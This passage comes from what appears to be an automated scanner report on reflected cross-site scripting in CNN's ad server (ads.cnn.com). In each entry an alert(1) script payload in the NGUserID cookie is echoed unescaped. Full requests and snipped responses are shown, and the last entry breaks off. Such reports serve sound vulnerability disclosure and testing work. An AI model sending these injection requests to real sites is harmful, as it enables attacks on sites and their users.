1.76. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=136756 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=136756

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57083"><script>alert(1)</script>e2de08365d3 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=136756 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-157083"><script>alert(1)</script>e2de08365d3; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:52 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:52 GMT
Pragma: no-cache
Content-Length: 3598
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
5,1589,1678,1686,1735,3448,3459,4443,37359,47128,47457,52263,52901,56058,56872,57810,57896,58702,61263,61887,61908,61913,63267,116201,116268,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-157083"><script>alert(1)</script>e2de08365d3%2CTIL%2C1313434014105&Redirect=http://www.money.com">
...[SNIP]...

1.77. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9135e"><script>alert(1)</script>e208cd85e88 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-19135e"><script>alert(1)</script>e208cd85e88; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ac%25253Amoney%25253A%25252F2011%25252F08%25252F15%25252Ftechnology%25252Fgoogle_motorola%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fiid%25253DEL%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:29 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:29 GMT
Pragma: no-cache
Content-Length: 2864
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
47128,47457,48989,52263,52752,52901,52977,54254,56058,56872,57896,58702,60072,60074,60077,60093,60443,61089,61263,61421,61887,61908,61913,63267,116729&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-19135e"><script>alert(1)</script>e208cd85e88%2CTIL%2C1313434106153&amp;random=cbvNphc,bhesArzdoIgcK&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-19135e"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Ee208cd85e88" width="1"
...[SNIP]...

1.78. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo¶ms.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dbeb"><script>alert(1)</script>2a7fe7a3786 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-19dbeb"><script>alert(1)</script>2a7fe7a3786; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ac%25253Amoney%25253A%25252F2011%25252F08%25252F15%25252Ftechnology%25252Fgoogle_motorola%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fiid%25253DEL%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:22 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:22 GMT
Pragma: no-cache
Content-Length: 2814
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
1589,1678,1686,1735,3458,4443,37359,47128,47457,48989,52263,52752,52754,52901,54254,56058,56872,57896,58702,61089,61263,61887,61908,61913,63267,116729&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-19dbeb"><script>alert(1)</script>2a7fe7a3786%2CTIL%2C1313434106153&amp;random=bbnxujr,bhesArsdoIdxy&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-19dbeb"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E2a7fe7a3786" width="1"
...[SNIP]...

1.79. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=main&cnn_money_position=336x280_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&cnn_money_subsection=homepage¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=637773 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=main&cnn_money_position=336x280_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&cnn_money_subsection=homepage&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=637773

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 190ac"><script>alert(1)</script>3f8ba544f57 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=main&cnn_money_position=336x280_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&cnn_money_subsection=homepage&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=637773 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1190ac"><script>alert(1)</script>3f8ba544f57; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:53 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:53 GMT
Pragma: no-cache
Content-Length: 4386
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
,3461,3494,3586,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,60072,60074,60077,60093,60443,61263,61421,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-1190ac"><script>alert(1)</script>3f8ba544f57%2CTIL%2C1313434014105&Redirect=http://twitter.com/fortunemagazine">
...[SNIP]...

1.80. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=social_sync&cnn_money_position=475x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=480339 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=social_sync&cnn_money_position=475x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=480339

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83c10"><script>alert(1)</script>cf016dd1918 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=social_sync&cnn_money_position=475x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=480339 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-183c10"><script>alert(1)</script>cf016dd1918; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:44 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:44 GMT
Pragma: no-cache
Content-Length: 3563
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
5,1589,1678,1686,1735,3443,3458,4443,37359,47128,47457,52263,52901,56058,56872,57810,58702,61263,61421,61887,61908,61913,63267,116196,116269,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-183c10"><script>alert(1)</script>cf016dd1918%2CTIL%2C1313433990029&Redirect=http://www.money.com">
...[SNIP]...

1.81. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d02ae"><script>alert(1)</script>995fc90c9d2 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1d02ae"><script>alert(1)</script>995fc90c9d2; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:47 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:47 GMT
Pragma: no-cache
Content-Length: 2863
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
7359,47128,47457,52263,52751,52901,56058,56872,57896,58702,60072,60074,60077,60093,60443,60541,60599,61263,61421,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1d02ae"><script>alert(1)</script>995fc90c9d2%2CTIL%2C1313434014105&amp;random=bimReoe,bhesAmxdozpsA&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1d02ae"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E995fc90c9d2" width="1"
...[SNIP]...

1.82. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf9b9"><script>alert(1)</script>04bc88dd9a7 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1cf9b9"><script>alert(1)</script>04bc88dd9a7; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:44 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:44 GMT
Pragma: no-cache
Content-Length: 2820
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
1285,1589,1678,1686,1735,3458,4443,37359,47128,47457,52263,52751,52901,56058,56872,58702,60541,60599,61263,61421,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1cf9b9"><script>alert(1)</script>04bc88dd9a7%2CTIL%2C1313433990029&amp;random=boRcvKi,bhesAkydoyyqc&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1cf9b9"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E04bc88dd9a7" width="1"
...[SNIP]...

1.83. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014106&page.allowcompete=yes&domId=644255 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014106&page.allowcompete=yes&domId=644255

Issue detail

